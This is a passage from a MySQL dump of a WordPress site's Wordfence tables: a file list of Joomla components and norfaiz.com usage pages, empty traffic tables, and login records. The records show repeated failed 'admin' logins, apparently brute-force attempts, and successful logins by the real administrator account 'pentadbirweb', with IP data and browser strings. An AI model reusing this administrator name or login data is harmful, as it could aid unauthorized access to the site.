949c04f7/joomlaboard/install.joomlaboard.php'),(24429,'install_469ce949c04f7/joomlaboard/joomlaboard.php'),(24430,'install_469ce949c04f7/joomlaboard/joomlaboard_config.php'),(24431,'install_469ce949c04f7/joomlaboard/joomlaboard_mosbot_help.php'),(24432,'install_469ce949c04f7/joomlaboard/language/.svn/prop-base/english.php.svn-base'),(24433,'install_469ce949c04f7/joomlaboard/language/.svn/prop-base/hrvatski.php.svn-base'),(24434,'install_469ce949c04f7/joomlaboard/language/.svn/prop-base/serbian_lat.php.svn-base'),(24435,'install_469ce949c04f7/joomlaboard/language/.svn/prop-base/simplified_chinese.php.svn-base'),(24436,'install_469ce949c04f7/joomlaboard/language/.svn/prop-base/traditional_chinese.php.svn-base'),(24437,'install_469ce949c04f7/joomlaboard/language/.svn/props/english.php.svn-work'),(24438,'install_469ce949c04f7/joomlaboard/language/.svn/props/hrvatski.php.svn-work'),(24439,'install_469ce949c04f7/joomlaboard/language/.svn/props/serbian_lat.php.svn-work'),(24440,'install_469ce949c04f7/joomlaboard/language/.svn/props/simplified_chinese.php.svn-work'),(24441,'install_469ce949c04f7/joomlaboard/language/.svn/props/traditional_chinese.php.svn-work'),(24442,'install_469ce949c04f7/joomlaboard/language/.svn/text-base/english.php.svn-base'),(24443,'install_469ce949c04f7/joomlaboard/language/.svn/text-base/hrvatski.php.svn-base'),(24444,'install_469ce949c04f7/joomlaboard/language/.svn/text-base/serbian_lat.php.svn-base'),(24445,'install_469ce949c04f7/joomlaboard/language/.svn/text-base/simplified_chinese.php.svn-base'),(24446,'install_469ce949c04f7/joomlaboard/language/.svn/text-base/traditional_chinese.php.svn-base'),(24447,'install_469ce949c04f7/joomlaboard/language/.svn/wcprops/english.php.svn-work'),(24448,'install_469ce949c04f7/joomlaboard/language/.svn/wcprops/hrvatski.php.svn-work'),(24449,'install_469ce949c04f7/joomlaboard/language/.svn/wcprops/serbian_lat.php.svn-work'),(24450,'install_469ce949c04f7/joomlaboard/language/.svn/wcprops/simplified_chinese.php.svn-work'),(24451,'install_469ce949c04f7/joomlaboard/language/.svn/wcprops/traditional_chinese.php.svn-work'),(24452,'install_469ce949c04f7/joomlaboard/language/english.php'),(24453,'install_469ce949c04f7/joomlaboard/language/hrvatski.php'),(24454,'install_469ce949c04f7/joomlaboard/language/serbian_lat.php'),(24455,'install_469ce949c04f7/joomlaboard/language/simplified_chinese.php'),(24456,'install_469ce949c04f7/joomlaboard/language/traditional_chinese.php'),(24457,'install_469ce949c04f7/joomlaboard/latestx.php'),(24458,'install_469ce949c04f7/joomlaboard/listcat.php'),(24459,'install_469ce949c04f7/joomlaboard/moderate_messages.php'),(24460,'install_469ce949c04f7/joomlaboard/post.php'),(24461,'install_469ce949c04f7/joomlaboard/rules.php'),(24462,'install_469ce949c04f7/joomlaboard/sb_cpanel.php'),(24463,'install_469ce949c04f7/joomlaboard/sb_helpers.php'),(24464,'install_469ce949c04f7/joomlaboard/sb_karma.php'),(24465,'install_469ce949c04f7/joomlaboard/sb_pdf.php'),(24466,'install_469ce949c04f7/joomlaboard/sb_rss.php'),(24467,'install_469ce949c04f7/joomlaboard/sb_statsbar.php'),(24468,'install_469ce949c04f7/joomlaboard/showcat.php'),(24469,'install_469ce949c04f7/joomlaboard/smile.class.php'),(24470,'install_469ce949c04f7/joomlaboard/stats.php'),(24471,'install_469ce949c04f7/joomlaboard/template/.svn/prop-base/index.php.svn-base'),(24472,'install_469ce949c04f7/joomlaboard/template/.svn/props/index.php.svn-work'),(24473,'install_469ce949c04f7/joomlaboard/template/.svn/text-base/index.php.svn-base'),(24474,'install_469ce949c04f7/joomlaboard/template/.svn/wcprops/index.php.svn-work'),(24475,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/prop-base/d_blue_view.php.svn-base'),(24476,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/prop-base/footer.html.svn-base'),(24477,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/prop-base/header.html.svn-base'),(24478,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/props/d_blue_view.php.svn-work'),(24479,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/props/footer.html.svn-work'),(24480,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/props/header.html.svn-work'),(24481,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/text-base/d_blue_view.php.svn-base'),(24482,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/text-base/footer.html.svn-base'),(24483,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/text-base/header.html.svn-base'),(24484,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/wcprops/d_blue_view.php.svn-work'),(24485,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/wcprops/footer.html.svn-work'),(24486,'install_469ce949c04f7/joomlaboard/template/d_blue/.svn/wcprops/header.html.svn-work'),(24487,'install_469ce949c04f7/joomlaboard/template/d_blue/d_blue_view.php'),(24488,'install_469ce949c04f7/joomlaboard/template/d_blue/footer.html'),(24489,'install_469ce949c04f7/joomlaboard/template/d_blue/header.html'),(24490,'install_469ce949c04f7/joomlaboard/template/default/.svn/prop-base/default_view.php.svn-base'),(24491,'install_469ce949c04f7/joomlaboard/template/default/.svn/prop-base/footer.html.svn-base'),(24492,'install_469ce949c04f7/joomlaboard/template/default/.svn/prop-base/header.html.svn-base'),(24493,'install_469ce949c04f7/joomlaboard/template/default/.svn/props/default_view.php.svn-work'),(24494,'install_469ce949c04f7/joomlaboard/template/default/.svn/props/footer.html.svn-work'),(24495,'install_469ce949c04f7/joomlaboard/template/default/.svn/props/header.html.svn-work'),(24496,'install_469ce949c04f7/joomlaboard/template/default/.svn/text-base/default_view.php.svn-base'),(24497,'install_469ce949c04f7/joomlaboard/template/default/.svn/text-base/footer.html.svn-base'),(24498,'install_469ce949c04f7/joomlaboard/template/default/.svn/text-base/header.html.svn-base'),(24499,'install_469ce949c04f7/joomlaboard/template/default/.svn/wcprops/default_view.php.svn-work'),(24500,'install_469ce949c04f7/joomlaboard/template/default/.svn/wcprops/footer.html.svn-work'),(24501,'install_469ce949c04f7/joomlaboard/template/default/.svn/wcprops/header.html.svn-work'),(24502,'install_469ce949c04f7/joomlaboard/template/default/default_view.php'),(24503,'install_469ce949c04f7/joomlaboard/template/default/footer.html'),(24504,'install_469ce949c04f7/joomlaboard/template/default/header.html'),(24505,'install_469ce949c04f7/joomlaboard/template/index.php'),(24506,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/prop-base/footer.html.svn-base'),(24507,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/prop-base/header.html.svn-base'),(24508,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/prop-base/tsmfQR_view.php.svn-base'),(24509,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/props/footer.html.svn-work'),(24510,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/props/header.html.svn-work'),(24511,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/props/tsmfQR_view.php.svn-work'),(24512,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/text-base/footer.html.svn-base'),(24513,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/text-base/header.html.svn-base'),(24514,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/text-base/tsmfQR_view.php.svn-base'),(24515,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/wcprops/footer.html.svn-work'),(24516,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/wcprops/header.html.svn-work'),(24517,'install_469ce949c04f7/joomlaboard/template/tsmfQR/.svn/wcprops/tsmfQR_view.php.svn-work'),(24518,'install_469ce949c04f7/joomlaboard/template/tsmfQR/footer.html'),(24519,'install_469ce949c04f7/joomlaboard/template/tsmfQR/header.html'),(24520,'install_469ce949c04f7/joomlaboard/template/tsmfQR/tsmfQR_view.php'),(24521,'install_469ce949c04f7/joomlaboard/thread.php'),(24522,'install_469ce949c04f7/joomlaboard/toolbar.joomlaboard.html.php'),(24523,'install_469ce949c04f7/joomlaboard/toolbar.joomlaboard.php'),(24524,'install_469ce949c04f7/joomlaboard/uninstall.joomlaboard.php'),(24525,'install_469ce949c04f7/joomlaboard/uploaded/.svn/prop-base/index.php.svn-base'),(24526,'install_469ce949c04f7/joomlaboard/uploaded/.svn/props/index.php.svn-work'),(24527,'install_469ce949c04f7/joomlaboard/uploaded/.svn/text-base/index.php.svn-base'),(24528,'install_469ce949c04f7/joomlaboard/uploaded/.svn/wcprops/index.php.svn-work'),(24529,'install_469ce949c04f7/joomlaboard/uploaded/files/.svn/prop-base/index.php.svn-base'),(24530,'install_469ce949c04f7/joomlaboard/uploaded/files/.svn/props/index.php.svn-work'),(24531,'install_469ce949c04f7/joomlaboard/uploaded/files/.svn/text-base/index.php.svn-base'),(24532,'install_469ce949c04f7/joomlaboard/uploaded/files/.svn/wcprops/index.php.svn-work'),(24533,'install_469ce949c04f7/joomlaboard/uploaded/files/index.php'),(24534,'install_469ce949c04f7/joomlaboard/uploaded/index.php'),(24535,'install_469ce949c04f7/joomlaboard/userprofile.php'),(24536,'install_469ce949c04f7/joomlaboard/view.php'),(24537,'install_469ce949c04f7/joomlaboard/write.html.php'),(24538,'s/fatAjax.php'),(24539,'s/index.html'),(24540,'s/mod_archive.php'),(24541,'s/mod_banners.php'),(24542,'s/mod_cblogin.php'),(24543,'s/mod_comprofilermoderator.php'),(24544,'s/mod_comprofileronline.php'),(24545,'s/mod_fb_statistics.php'),(24546,'s/mod_fb_users.php'),(24547,'s/mod_hydraproject.php'),(24548,'s/mod_jcalpro_latest.php'),(24549,'s/mod_latestnews.php'),(24550,'s/mod_login.php'),(24551,'s/mod_mainmenu.php'),(24552,'s/mod_mostread.php'),(24553,'s/mod_newsflash.php'),(24554,'s/mod_poll.php'),(24555,'s/mod_random_image.php'),(24556,'s/mod_related_items.php'),(24557,'s/mod_rssfeed.php'),(24558,'s/mod_search.php'),(24559,'s/mod_sections.php'),(24560,'s/mod_shoutbox.php'),(24561,'s/mod_shoutbox_css.php'),(24562,'s/mod_stats.php'),(24563,'s/mod_statscodes.php'),(24564,'s/mod_templatechooser.php'),(24565,'s/mod_whosonline.php'),(24566,'s/mod_wrapper.php'),(24567,'s/shoutbox/moo.fx.js'),(24568,'s/shoutbox/moo.fx.pack.js'),(24569,'s/shoutbox/prototype.lite.js'),(24570,'s/shoutbox/smilie.js'),(24571,'e.php'),(24572,'ebar.php'),(24573,'y.php'),(24574,'tes/404.php'),(24575,'tes/css/index.html'),(24576,'tes/index.html'),(24577,'tes/ja_bellatrix/css/index.html'),(24578,'tes/ja_bellatrix/footer.php'),(24579,'tes/ja_bellatrix/images/index.html'),(24580,'tes/ja_bellatrix/index.html'),(24581,'tes/ja_bellatrix/index.php'),(24582,'tes/ja_bellatrix/ja_cssmenu/img/index.html'),(24583,'tes/ja_bellatrix/ja_cssmenu/index.html'),(24584,'tes/ja_bellatrix/ja_cssmenu/ja-cssmenu.php'),(24585,'tes/ja_bellatrix/ja_cssmenu/ja-menulib.php'),(24586,'tes/ja_bellatrix/ja_cssmenu/ja.cssmenu.js'),(24587,'tes/ja_bellatrix/ja_cssmenu.php'),(24588,'tes/ja_bellatrix/ja_scriptdlmenu/img/index.html'),(24589,'tes/ja_bellatrix/ja_scriptdlmenu/ja-menulib.php'),(24590,'tes/ja_bellatrix/ja_scriptdlmenu/ja-scriptdlmenu.class.php'),(24591,'tes/ja_bellatrix/ja_scriptdlmenu/ja-scriptdlmenu.js'),(24592,'tes/ja_bellatrix/ja_scriptdlmenu.php'),(24593,'tes/ja_bellatrix/ja_splitmenu/img/index.html'),(24594,'tes/ja_bellatrix/ja_splitmenu/index.html'),(24595,'tes/ja_bellatrix/ja_splitmenu.php'),(24596,'tes/ja_bellatrix/ja_templatetools.php'),(24597,'tes/ja_bellatrix/ja_transmenu/img/index.html'),(24598,'tes/ja_bellatrix/ja_transmenu/index.html'),(24599,'tes/ja_bellatrix/ja_transmenu/ja-menulib.php'),(24600,'tes/ja_bellatrix/ja_transmenu/ja-transmenu.js'),(24601,'tes/ja_bellatrix/ja_transmenu/ja-transmenu.php'),(24602,'tes/ja_bellatrix/ja_transmenu.php'),(24603,'tes/ja_bellatrix/scripts/index.html'),(24604,'tes/ja_bellatrix/scripts/ja.script.js'),(24605,'tes/ja_bellatrix/scripts/opacity.js'),(24606,'tes/madeyourweb/css/index.html'),(24607,'tes/madeyourweb/images/index.html'),(24608,'tes/madeyourweb/index.html'),(24609,'tes/madeyourweb/index.php'),(24610,'tes/rhuk_solarflare_ii/css/index.html'),(24611,'tes/rhuk_solarflare_ii/images/index.html'),(24612,'tes/rhuk_solarflare_ii/index.html'),(24613,'tes/rhuk_solarflare_ii/index.php'),(24614,'tes/rt_sporticus/css/index.html'),(24615,'tes/rt_sporticus/images/index.html'),(24616,'tes/rt_sporticus/index.php'),(24617,'tes/rt_sporticus/js/livesearch.js'),(24618,'tes/rt_sporticus/js/mootools.release.83.js'),(24619,'tes/rt_sporticus/js/rt_sameheight.js'),(24620,'tes/rt_sporticus/js/slimbox.js'),(24621,'tes/rt_sporticus/livesearch/livesearch.php'),(24622,'tes/rt_sporticus/livesearch/livesearch_ui.php'),(24623,'tes/rt_sporticus/rt_splitmenu.php'),(24624,'rfaiz.com/usage_200812.html'),(24625,'rfaiz.com/usage_200901.html'),(24626,'rfaiz.com/usage_200902.html'),(24627,'aiz.com/usage_200901.html'),(24628,'aiz.com/usage_200902.html'),(24629,'z.com/usage_200705.html'),(24630,'z.com/usage_200706.html'),(24631,'z.com/usage_200707.html'),(24632,'z.com/usage_200708.html'),(24633,'z.com/usage_200801.html'),(24634,'z.com/usage_200811.html'),(24635,'z.com/usage_200812.html'),(24636,'z.com/usage_200901.html'),(24637,'z.com/usage_200902.html'),(24638,'an.norfaiz.com/usage_200806.html'),(24639,'an.norfaiz.com/usage_200807.html'),(24640,'an.norfaiz.com/usage_200808.html'),(24641,'an.norfaiz.com/usage_200809.html'),(24642,'an.norfaiz.com/usage_200810.html'),(24643,'an.norfaiz.com/usage_200811.html'),(24644,'an.norfaiz.com/usage_200812.html'),(24645,'an.norfaiz.com/usage_200901.html'),(24646,'an.norfaiz.com/usage_200902.html'),(24647,'iz.com/usage_200806.html'),(24648,'iz.com/usage_200807.html'),(24649,'iz.com/usage_200808.html'),(24650,'iz.com/usage_200809.html'),(24651,'iz.com/usage_200810.html'),(24652,'iz.com/usage_200811.html'),(24653,'iz.com/usage_200812.html'),(24654,'iz.com/usage_200901.html'),(24655,'iz.com/usage_200902.html'),(24656,'com/usage_200709.html'),(24657,'com/usage_200710.html'),(24658,'com/usage_200711.html'),(24659,'com/usage_200712.html'),(24660,'com/usage_200801.html'),(24661,'com/usage_200802.html'),(24662,'com/usage_200803.html'),(24663,'com/usage_200804.html'),(24664,'com/usage_200805.html'),(24665,'com/usage_200806.html'),(24666,'com/usage_200807.html'),(24667,'com/usage_200808.html'),(24668,'com/usage_200809.html'),(24669,'com/usage_200810.html'),(24670,'com/usage_200811.html'),(24671,'com/usage_200812.html'),(24672,'com/usage_200901.html'),(24673,'com/usage_200902.html'),(24674,'com.my/usage_200901.html'),(24675,'com.my/usage_200902.html'),(24676,'om/usage_200704.html'),(24677,'om/usage_200705.html'),(24678,'om/usage_200807.html'),(24679,'iz.com/usage_200704.html'),(24680,'iz.com/usage_200705.html'),(24681,'iz.com/usage_200706.html'),(24682,'iz.com/usage_200707.html'),(24683,'iz.com/usage_200708.html'),(24684,'iz.com/usage_200709.html'),(24685,'iz.com/usage_200710.html'),(24686,'iz.com/usage_200711.html'),(24687,'iz.com/usage_200712.html'),(24688,'iz.com/usage_200801.html'),(24689,'iz.com/usage_200802.html'),(24690,'iz.com/usage_200803.html'),(24691,'iz.com/usage_200804.html'),(24692,'om/usage_200703.html'),(24693,'om/usage_200704.html'),(24694,'om/usage_200705.html'),(24695,'om/usage_200706.html'),(24696,'om/usage_200707.html'),(24697,'om/usage_200709.html'),(24698,'om/usage_200806.html'),(24699,'om/usage_200807.html'),(24700,'y.norfaiz.com/usage_200806.html'),(24701,'y.norfaiz.com/usage_200807.html'),(24702,'y.norfaiz.com/usage_200808.html'),(24703,'y.norfaiz.com/usage_200809.html'),(24704,'y.norfaiz.com/usage_200810.html'),(24705,'y.norfaiz.com/usage_200811.html'),(24706,'y.norfaiz.com/usage_200812.html'),(24707,'y.norfaiz.com/usage_200901.html'),(24708,'y.norfaiz.com/usage_200902.html'),(24709,'net/usage_200807.html'),(24710,'net/usage_200808.html'),(24711,'net/usage_200809.html'),(24712,'net/usage_200810.html'),(24713,'net/usage_200811.html'),(24714,'net/usage_200812.html'),(24715,'net/usage_200902.html'),(24716,'iz.com/usage_200707.html'),(24717,'iz.com/usage_200708.html'),(24718,'iz.com/usage_200709.html'),(24719,'iz.com/usage_200710.html'),(24720,'iz.com/usage_200711.html'),(24721,'iz.com/usage_200712.html'),(24722,'iz.com/usage_200801.html'),(24723,'iz.com/usage_200802.html'),(24724,'iz.com/usage_200803.html'),(24725,'iz.com/usage_200804.html'),(24726,'iz.com/usage_200805.html'),(24727,'iz.com/usage_200806.html'),(24728,'iz.com/usage_200807.html'),(24729,'iz.com/usage_200808.html'),(24730,'iz.com/usage_200809.html'),(24731,'iz.com/usage_200810.html'),(24732,'iz.com/usage_200811.html'),(24733,'iz.com/usage_200812.html'),(24734,'iz.com/usage_200901.html'),(24735,'iz.com/usage_200902.html'),(24736,'faiz.com/usage_200703.html'),(24737,'faiz.com/usage_200706.html'),(24738,'faiz.com/usage_200707.html'),(24739,'faiz.com/usage_200806.html'),(24740,'.com/usage_200707.html'),(24741,'rfaiz.com/usage_200710.html'),(24742,'norfaiz.com/usage_200707.html'),(24743,'norfaiz.com/usage_200708.html'),(24744,'norfaiz.com/usage_200709.html'),(24745,'norfaiz.com/usage_200710.html'),(24746,'norfaiz.com/usage_200711.html'),(24747,'norfaiz.com/usage_200712.html'),(24748,'norfaiz.com/usage_200801.html'),(24749,'norfaiz.com/usage_200802.html'),(24750,'norfaiz.com/usage_200803.html'),(24751,'norfaiz.com/usage_200804.html'),(24752,'norfaiz.com/usage_200805.html'),(24753,'norfaiz.com/usage_200806.html'),(24754,'norfaiz.com/usage_200807.html'),(24755,'norfaiz.com/usage_200808.html'),(24756,'norfaiz.com/usage_200809.html'),(24757,'norfaiz.com/usage_200810.html'),(24758,'norfaiz.com/usage_200811.html'),(24759,'norfaiz.com/usage_200812.html'),(24760,'norfaiz.com/usage_200901.html'),(24761,'norfaiz.com/usage_200902.html'),(24762,'com/usage_200707.html'),(24763,'com/usage_200708.html'),(24764,'com/usage_200710.html'),(24765,'com/usage_200806.html'),(24766,'m/usage_200808.html'),(24767,'m/usage_200809.html'),(24768,'m/usage_200810.html'),(24769,'m/usage_200811.html'),(24770,'m/usage_200812.html'),(24771,'m/usage_200901.html'),(24772,'m/usage_200902.html'),(24773,'rfaiz.com/usage_200708.html'),(24774,'rfaiz.com/usage_200709.html'),(24775,'rfaiz.com/usage_200710.html'),(24776,'rfaiz.com/usage_200711.html'),(24777,'rfaiz.com/usage_200712.html'),(24778,'rfaiz.com/usage_200801.html'),(24779,'rfaiz.com/usage_200802.html'),(24780,'rfaiz.com/usage_200803.html'),(24781,'rfaiz.com/usage_200804.html'),(24782,'rfaiz.com/usage_200805.html'),(24783,'rfaiz.com/usage_200806.html'),(24784,'rfaiz.com/usage_200807.html'),(24785,'rfaiz.com/usage_200808.html'),(24786,'rfaiz.com/usage_200809.html'),(24787,'rfaiz.com/usage_200810.html'),(24788,'rfaiz.com/usage_200811.html'),(24789,'rfaiz.com/usage_200812.html'),(24790,'rfaiz.com/usage_200901.html'),(24791,'rfaiz.com/usage_200902.html'),(24792,'.com/usage_200703.html'),(24793,'faiz.com/usage_200707.html'),(24794,'iz.com/usage_200703.html'),(24795,'iz.com/usage_200705.html'),(24796,'com/usage_200710.html'),(24797,'bum.norfaiz.com/usage_200812.html'),(24798,'bum.norfaiz.com/usage_200901.html'),(24799,'bum.norfaiz.com/usage_200902.html'),(24800,'com/usage_200706.html'),(24801,'com/usage_200707.html'),(24802,'com/usage_200708.html'),(24803,'com/usage_200806.html'),(24804,'html'),(24805,'html'),(24806,'html'),(24807,'html'),(24808,'html'),(24809,'html'),(24810,'html'),(24811,'html'),(24812,'html'),(24813,'html'),(24814,'html'),(24815,'html'),(24816,'html'),(24817,'html'),(24818,'html'),(24819,'html'),(24820,'html'),(24821,'html'),(24822,'html'),(24823,'html'),(24824,'html'),(24825,'html'),(24826,'html'),(24827,'html'),(24828,'faiz.com/usage_200706.html'),(24829,'man.norfaiz.com/usage_200901.html'),(24830,'man.norfaiz.com/usage_200902.html'),(24831,'aiz.com/usage_200707.html'),(24832,'aiz.com/usage_200708.html'),(24833,'aiz.com/usage_200709.html'),(24834,'aiz.com/usage_200710.html'),(24835,'aiz.com/usage_200711.html'),(24836,'aiz.com/usage_200712.html'),(24837,'aiz.com/usage_200801.html'),(24838,'aiz.com/usage_200802.html'),(24839,'aiz.com/usage_200803.html'),(24840,'aiz.com/usage_200804.html'),(24841,'aiz.com/usage_200805.html'),(24842,'aiz.com/usage_200806.html'),(24843,'03.html'),(24844,'04.html'),(24845,'05.html'),(24846,'06.html'),(24847,'07.html'),(24848,'08.html'),(24849,'09.html'),(24850,'10.html'),(24851,'11.html'),(24852,'06.html'),(24853,'07.html'),(24854,'10.html'),(24855,'12.html'),(24856,'01.html'),(24857,'02.html');
/*!40000 ALTER TABLE `wpdp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wpdp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wflivetraffichuman`
--

LOCK TABLES `wpdp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wpdp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wflocs`
--

DROP TABLE IF EXISTS `wpdp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT '0.0000000',
  `lon` float(10,7) DEFAULT '0.0000000',
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wflocs`
--

LOCK TABLES `wpdp_wflocs` WRITE;
/*!40000 ALTER TABLE `wpdp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wflogins`
--

DROP TABLE IF EXISTS `wpdp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=MyISAM AUTO_INCREMENT=10700 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wflogins`
--

LOCK TABLES `wpdp_wflogins` WRITE;
/*!40000 ALTER TABLE `wpdp_wflogins` DISABLE KEYS */;
INSERT INTO `wpdp_wflogins` (`id`, `hitID`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES (10692,37557,1569081758.747661,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿ<5+1','Mozilla/5.0 (Linux; Android 9; EML-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36'),(10691,37553,1569076727.059517,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿPÓ;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10690,37552,1569076693.069954,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¹P\\{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10689,37551,1569076610.913828,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3K „','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10699,37750,1569921973.578857,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿs„«','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(10698,37748,1569892722.614598,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿs„«','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(10697,37747,1569810226.421365,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿ¯Žv+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(10696,37726,1569458547.489235,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿs„‘€','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(10695,37604,1569376789.309670,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿs„‘p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(10694,37563,1569203532.738624,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿ¯‹®E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),(10693,37562,1569201365.099516,0,'loginOK','pentadbirweb',1,'\0\0\0\0\0\0\0\0\0\0ÿÿ¯‹®E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),(10593,37454,1569074002.214841,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿPÓ;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10594,37455,1569074006.846130,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿY‘J[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10595,37456,1569074027.644183,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÀ£æL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10596,37457,1569074042.189176,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦ïq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10597,37458,1569074082.456467,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ\rL›ó','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10598,37459,1569074117.617208,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3Ñ]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10599,37460,1569074160.629272,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÃ‰Ê¥','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 